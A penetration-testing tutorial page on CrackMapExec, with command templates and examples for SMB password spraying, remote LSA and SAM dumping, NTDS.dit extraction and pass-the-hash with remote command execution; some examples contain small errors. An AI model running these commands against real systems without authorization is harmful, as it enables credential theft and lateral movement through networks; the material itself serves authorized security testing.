Skip to main content

CrackMapExec

This section will cover using CrackMapExec.

Table of Contents
  • Overview
  • CrackMapExec Usage
    • Dumping LSA secrets and SAM Database
    • Capturing the NTDS.dit Contents
    • Pass the Hash
  • SMB
    • Enumerating Logged-on Users
    • Brute Forcing and Password Spraying

Overview

CrackMapExec is a versatile tool that can perform actions such as obtaining password hashes in Windows environments using different protocols such as SMB, LDAP, MSSQL, and more.

To install it, use the command apt install crackmapexec.

CrackMapExec Usage

We can use the -h flag to view the available options. There are also protocol specific help by specifying the protocol before the -h flag.

crackmapexec smb -h

To use crackmapexec, we can use the following command.

crackmapexec <protocol> <Target IP> -u <username or username wordlist> -p <password or password wordlist>

Command breakdown:

  • <protocol> - Specify the protocol to use.
  • <Targt IP> - Specify the target IP address.
  • -u <username or username wordlist> - Specify the username or wordlist to use.
  • -p <password or password wordlist> - Specify the password or the wordlist to use.

An example will be:

crackmapexec smb 10.130.0.12 -u ~/main/wordlists/userlist.txt -p ~/main/wordlists/megapass.txt

Command breakdown:

  • smb - Specify to use the SMB protocol.
  • 10.130.0.12 - Specify the target IP address.
  • -u ~/main/wordlists/userlist.txt - Specify the username wordlist.
  • -p ~/main/wordlists/megapass.txt - Specify the password wordlist.

When successful, it will show a pwned next to it. Once the credentials are found, flags such as --shares can be used with the smb protocol to list all available shares on the target.

Dumping LSA secrets and SAM database

We can use crackmapexec to dump the hashes from a SAM database or LSA secrets remotely. We can specify the --lsa or --sam flag to choose if we want to dump the LSA secrets or SAM database remotely.

crackmapexec <service> <Target IP> --local-auth -u <username> -p <password> --lsa

Command breakdown:

  • <service> - Specify the service to attack.
  • <Target IP> - Specify the target IP address.
  • --local-auth - Specify to authenticate as a local user.
  • -u <username> - Specify the username to use for authentication.
  • -p <password> - Specify the password to use for authentication.
  • --lsa - Specify to dump the LSA secrets.

An example will be:

crackmapexec smb 10.42.0.200 --local-auth -u myuser -p superS3cret --lsa

The above command will dump the LSA secrets. Replace --lsa with --sam to dump the SAM database instead.

Note that a valid user is required for this to work.

Capturing the NTDS.dit Contents

We can use the --ntds flag to obtain the NTDS.dit file contents.

crackmapexec <service> -u <username> -p <password> --ntds

An example will be:

crackmapexec smb -u svradmin -p adm1nPW --ntds

Note that the user has to be an administrator or equivalent role.

Pass the Hash

We can use perform password spraying on a range on hosts using the following command.

crackmapexec <service> <Target Network IP>/<CIDR> -u <username> -d <domain> -H <password hash>

Command breakdown:

  • <service> - Specify the service to exploit.
  • <Target Network IP>/<CIDR> - Specify the network address of the target and the CIDR notation.
  • -u <username> - Specify the username to use.
  • -d <domain> - Specify the domain.
  • -H <password hash> - Specify the hash to use.

An example will be:

crackmapexec smb 10.42.0.0/24 -u myuser -d acorp.lan -H BCD82943C6AC81E7DFFBD85D253961FA

We can also use the -x switch to run commands after identifying successful hosts.

crackmapexec smb 10.42.0.50 -u myuser -d acorp.lan -H BCD82943C6AC81E7DFFBD85D253961FA -x whoami

Command breakdown:

  • smb - Specify the service to use.
  • 10.42.0.50 - Specify the target IP address.
  • -u myuser - Specify the user.
  • -d acorp.lan - Specify the domain.
  • -H BCD82943C6AC81E7DFFBD85D253961FA - Specify the hash.
  • -x whoami - Specify to run a command. In this example whoami.

SMB

To enumerate SMB, we can use the smb module and the following flags.

Enumerating Logged-on Users

We can use the --loggedon-users switch to enumerate logged-on users on a network.

crackmapexec smb <Network address>/<CIDR> -u <username> -p '<password>' --loggedon-users

Command breakdown:

  • smb - Specify to use the SMB module.
  • <Network address>/<CIDR> - Specify the network address and CIDR of the network.
  • -u <username> - Specify the username to use for authentication.
  • -p '<password>' - Specify the password to use for authentication.
  • --loggedon-users - Enumerate logged-on users.

An example:

crackmapexec smb 10.200.23.0/24 -u administrator -p 'password1' --loggon-users

Brute Forcing and Password Spraying

We can specify a network or single target and a list of usernames and passwords to use to perform a brute force or password spray attack. We can use the --local-auth flag to test for local account logins.

crackmapexec smb <Target IP> -u /path/to/user/wordlist -p '<password>' --local-auth

Command breakdown:

  • smb - Specify to use the SMB module.
  • <Target IP> - Specify the IP address of the target.
  • -u /path/to/user/wordlist - Specify the username wordlist to use.
  • -p '<password>' - Specify the password to use for authentication.
  • --local-auth - Login as a local account.

An example:

crackmapexec smb 10.129.0.22 -u usernames.txt -p 'Password!' --local-auth